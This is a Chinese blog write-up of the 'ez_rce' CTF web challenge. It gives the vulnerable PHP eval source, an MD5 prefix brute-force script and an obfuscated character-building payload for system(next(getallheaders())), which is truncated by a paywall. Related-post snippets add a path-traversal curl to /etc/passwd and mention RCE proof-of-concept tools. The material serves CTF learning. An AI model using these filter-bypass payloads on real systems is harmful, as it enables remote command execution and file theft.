ez_rce

最新推荐文章于 2024-04-15 22:40:00 发布
最新推荐文章于 2024-04-15 22:40:00 发布
阅读量434 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43774856/article/details/111999205
版权

ez_rce

打开链接,得到源码
在这里插入图片描述

<?php
error_reporting(0);
if (!isset($_POST['code'])) {
    highlight_file(__FILE__);
} else {
    if (substr(md5($_GET['pass']), 0, 6) === "7b6db2") {
        $str = $_POST['code'];
        $butaixing = ['[a-z]','\+', '[\x7f-\xff]', '~', '%','=',';','\s', '*',"'", '"', '`', '\[', '\]', '\$', '_', '\\\\', '\^', ',','#','!','<','>'];
        foreach ($butaixing as $item) {
            if (preg_match('/' . $item . '/im', $str)) {
                die("臭弟弟,你想干啥?");
            }
        }
        eval('echo ' . $str . ';');
    }
}
?>

首先需要md5爆破一下,脚本如下:

from multiprocessing.dummy import Pool as tp
import hashlib

knownMd5 = '7b6db2'      #已知的md5明文
def md5(text): 
    return hashlib.md5(str(text).encode('utf-8')).hexdigest()

def findCode(code):   
    key = code.split(':')
    start = int(key[0])  
    end = int(key[1]) 
    for code in range(start, end):
        if md5(code)[0:6] == knownMd5:            
            print(code)
            break
list=[] 
for i in range(1):    #这里的range(number)指爆破出多少结果停止
    list.append(str(10000000*i) + ':' + str(10000000*(i+1)))
pool = tp()    #使用多线程加快爆破速度
pool.map(findCode, list) 
pool.close()
pool.join()

过滤了所有的字母,以及取反构造时可能用到的不可见字符,单双引号等字符。直接pass掉了一些思路:取反,异或,汉字截取。所以需要想别的方法来构造字母,.是用来连接字符串的,同时因为php弱类型的特点若是一个数字和一个字符连接的话,数字会自动被转换成字符,那么同样的,若是两个数字来连接,同样会将两个数字转换为字符。

<?php
@var_dump((1/0).(0));//string(4) "INF0"
@var_dump((0/0).(0));//string(4) "NAN0"
@var_dump((9999999999*9999999999).(0));//string(16) "9.999999998E+190"
@var_dump((3333/4).(0));//string(7) "833.250"

@$N = (((1/0).(0)){0});//string(1) "I"
@$N = (((1/0).(0)){1});//string(1) "N"
@$N = (((1/0).(0)){2});//string(1) "F"
?>

这里我们可以使用 system(next(getallheaders()))

((((((2).(0)){0}){0})|(((0/0).(0)){1})).(((1).(0)){0}|((1/0).(0)){0}).(((((2).(0)){0}){0})|(((0/0).(0)){1})).((((1/0).(0)){0}&((1/0).(0)){2})|(((4).(0)){0})).((((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2})))).(((((999**999).(1)){1})&((((-1).(0)){0})|(((0/0).(0)){1})))|((((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))))))((((0/0).(0)){0}.(((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))).((((1/0).(0)){0}&((1/0).(0)){1})|(((8).(0)){0})).(((((1/0).(0)){0}&((1/0).(0)){2})|(((4).(0)){0}))))(((((((999**999).(1)){2})|(((-2).(1)){0})&(((1).(0)){0}))).(((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2}))).(((((1/0).(0)){0}&((1/0).(0)){2})|(((4).(0)){0}))).((((0/0).(0)){1})|(((-2).(1)){0})&(((1).(0)){0})).((((((999**999).(1)){1})&((((-1).(0)){0})|(((0/0).(0)){1})))|((((((-1).(0)){0})|(((0/0).(0)){1}))&((((1).(0)){0})|(((999**999).(1)){2})))))&(((0/0).(0)){0})).((((((999**999).(1)){1})&((((-1).(0)){0})|(((0/0)
最低0.47元/天 解锁文章
yjj哈哈哈
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
RCE和preg_match绕过
weixin_55190422的博客
09-29 772
首先以题为例 进来后是这个界面 题目告诉我们用json格式所以我们输入{"cmd":"ls"}查看有啥文件 发现有index.php这个文件里面有源码,这个题目一开始是就给了源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking atte...
TDOA_RCE:通达OA综合利用工具
03-03
工具说明 通达OA综合利用工具_20210224 集成POC如下 任意用户登录POC:4个SQL注入POC:2个后台文件上传POC:3个本地文件包含POC:2个前台文件上传POC(非WEB目录):1个任意文件删除POC:1个 工具面板截图 ...
ezrce
lastwinn的博客
08-01 424
ezrce 打开题目看看 先注册一个账号 进去之后先创建一个项目 再添加一个接口 选择高级Mock,然后选择脚本,点击开启脚本,将payload放上去,点击保存 const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionCo...
[SWPUCTF 2024 新生赛]ez_rce(2),网络安全事件分发机制及设计思路
2301_78399466的博客
04-14 672
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
[NSSRound#4 SWPU]ez_rce
m0_73121489的博客
04-28 495
标签说是CVE-2021-41773(Apache HTTP Server路径穿越漏洞)这里直接cat /flag_is here 是什么都没有的。我一个个试了一遍,在run.sh里面找到了flag的真正位置。dirsearch扫目录也没有扫什么有用的出来。
[SWPUCTF 2022 新生赛]ez_rce
wyxlsm的博客
03-22 638
在写真不知道怎么下手 我去扫一下 后门文件 是有一些 tp5 的think php的漏洞 不说了 看下一步。这样我们看到flag 值 我们可以去访问他 得到flag。查看一下根目录下的flag 名字的文件。我们可以去访问他 得到。去利用漏洞利用的命令。
DASCTF July X CBCTF 4th--ezrce
qq_46263951的博客
08-05 268
YAPI Mock远程代码执行漏洞 YAPI使用mock数据/脚本作为中间交互层,其中mock数据通过设定固定数据返回固定内容,对于需要根据用户请求定制化响应内容的情况mock脚本通过写JS脚本的方式处理用户请求参数返回定制化内容,本次漏洞就是发生在mock脚本服务上。由于mock脚本自定义服务未对JS脚本加以命令过滤,用户可以添加任何请求处理脚本,因此可以在脚本中植入命令,等用户访问接口发起请求时触发命令执行。 添加一个项目后,这里是最关键的 const sandbox = this const
RCE.zip_RCE网络_rce_rce分类器
07-14
基于模式识别的RCE网络算法分类器(衰减库仑势法)。利用概率密度进行分类
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
SMBGhost_RCE_PoC
03-18
SMBGhost_RCE_PoC CVE-2020-0796“ SMBGhost”的RCE PoC 仅用于演示目的!仅将此用作参考。严重地。这尚未在我的实验室环境之外进行过测试。它写得很快,需要做一些工作才能更可靠。有时你会蓝屏。除了自我教育以外...
SMBGhost_RCE_PoC-master.zip
06-11
CVE-2020-0796代码执行EXP,接管主机权限,获取用户shell。该文件主要以学习为主,请遵守网络安全法,如若造成破坏,与本人无关。
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
weixin_46497491的博客
11-07 3777
[SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce
NSSCTF Round#7 Team ez_rce和0o0讲解
m0_64815693的博客
01-29 2608
NSSCTF Round#7 Team ez_rce和0o0讲解
2022UUCTF-web
bossDDYY的博客
11-03 1851
我们先输入手机号和验证码试试,发现无论请求多少次 hint永远是895547922,结合mt_srand和mt_rand函数 当设置的种子确定(此处的种子时输入的手机号)时,每次的mt_rand都是固定的 我们可以猜测hint就是mt_rand的第一次,而目的验证码就是mt_rand的第二次。而且我们笃定是有上传的网页的,限制了文件类型 我们想要上传的是so,但是LD_PRELOAD也能解析jpg后缀 所以修改后缀上传就可以。sub的值是当前时间的最后一位,也就是保证当前的时间为xxxxxxxx1即可。
[SWPUCTF 2024 新生赛]ez_rce(1),网络安全开发还会吃香吗
最新发布
weixin_58152093的博客
04-15 331
是 thinkphp 的经典页面,十年磨一剑。去找 5.0.x 版本的 payload。发现目录:/NSS/index.php/提示 thinkphp。这个页面真的什么都没有。
[UUCTF 2024 新生赛]ez_rce,你还看不明白
2301_78399466的博客
04-14 688
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
[UUCTF 2022 新生赛]ez_rce
m0_73612768的博客
01-03 966
反引号命令执行;shell 绕过关键字过滤;
纳新复赛wp
qq_74655174的博客
02-22 245
纳新复赛wp
nssctf round#4
weixin_63231007的博客
08-21 1187
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。怎么通过脚本直接修改这个phar文件里序列化好的数据来绕过wakeup这部分我不清楚,查看wp之后需要生成phar文件后,自己手动修改文件数据,用到脚本修改签名。文件的签名是第一次生成文件的时候自动生成的,所以当我们修改数据过后,由于签名错误,这个。
攻防世界php_rce
08-26
攻防世界中的php_rce是指一种利用PHP解释器的远程代码执行漏洞进行攻击和防御的技术。这种漏洞可以允许攻击者将恶意的PHP代码注入到服务器上,并执行任意命令。引用中的payload是构造了一个用于执行"ls /flag"命令的payload,而引用中的payload则是用于执行"cat /flag"命令的。这些payload利用了PHP解释器中的函数调用漏洞,通过构造特定的函数调用参数来执行系统命令。所以,这些payload可以用于远程执行系统命令,如列出/flag目录下的文件或显示/flag文件的内容。请注意,这些payload仅用于演示和研究目的,并且在现实环境中使用它们是违法的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界-web篇(php_rce)详解](https://blog.csdn.net/qq_54803507/article/details/127041653)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值